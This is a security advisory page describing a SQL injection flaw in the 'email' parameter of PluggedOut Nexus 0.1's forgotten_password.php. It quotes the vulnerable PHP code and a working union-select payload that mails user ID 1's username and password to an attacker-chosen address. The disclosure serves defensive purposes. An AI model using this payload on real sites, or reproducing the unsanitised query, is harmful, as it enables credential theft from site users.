Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (Forum/Board/Portal)  >   PluggedOut Nexus Vendors:   PluggedOut
PluggedOut Nexus Input Validation Flaw in 'forgotten_password.php' Permits SQL Injection
SecurityTracker Alert ID:  1015715
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 2 2006
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 0.1
Description:   Hamid Ebadi reported a vulnerability in PluggedOut Nexus. A remote user can inject SQL commands.

The 'forgotten_password.php' script does not properly validate user-supplied input in the 'email' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

This can be exploited to obtain passwords from the target application.

A demonstration exploit value is provided:

hamidnetworksecurityteam' union select
cUsername,cPassword,'ATTACKER@EMAIL.ADDRESS' from

Impact:   A remote user can execute SQL commands on the underlying database.
Solution:   No solution was available at the time of this entry.
Vendor URL: (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  PluggedOut Nexus SQL injection

PluggedOut Nexus SQL injection
Nexus is an open source script you can run on your web
server to give you a community based website
where people can register, search each others
interests, and communicate with one another either
through a private messaging system, or via chat
requests and forums.
Project : PluggedOut Nexus
Version : 0.1
Author  : Jonathan Beckett
Home   :

The information has been provided by Hamid Ebadi .
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:

Vulnerable Systems:PluggedOut Nexus 0.1


in this address If you fill the private email address
that you used while creating your account into the
form , the server will send you an email to that
address with your login details
Input passed to the "email" parameter in
"forgotten_password.php" isn't properly sanitised
before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code.

in E-Mail Address form enter ' and press Send Request 
you will redirect to
http://localhost/Nexus/site_problem.php and see :

Problem with Nexus website
A problem has occurred with the Nexus website - this
was not your fault, and the administrators probably
already know about it.

Vulnerable Code: The following lines in
"forgotten_password.php" :
if ($_POST["submit"]!=""){
	$con = db_connect();
	$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM
nexus_users WHERE
$result = mysql_query($sql,$con);
	if ($result!=false){
		if (mysql_num_rows($result)>0){
			$row = mysql_fetch_array($result);
			$from = $site_admin_email;
			$to = $row["cEMailPrivate"];
			$subject = "Reminder Username/Password from
			$body = "This email has been sent following a
request for a reminder username/password in the
".$site_long_name." website.\n\n"
				."Your account details are as follows;\n"
				."  Username : ".$row["cUsername"]."\n"
				."  Password : ".$row["cPassword"]."\n\n"
				."If you did not request this reminder message,
please contact the ".$site_long_name." administrator




insert this code in E-Mail Address form
(http://localhost/Nexus/forgotten_password.php) :
hamidnetworksecurityteam' union select
cUsername,cPassword,'ATTACKER@EMAIL.ADDRESS' from
nexus_users WHERE nUserId=1 and '1'='1

and ATTACKER@EMAIL.ADDRESS  recieve email contain
username & password for userID=1 . 


Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 

Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, LLC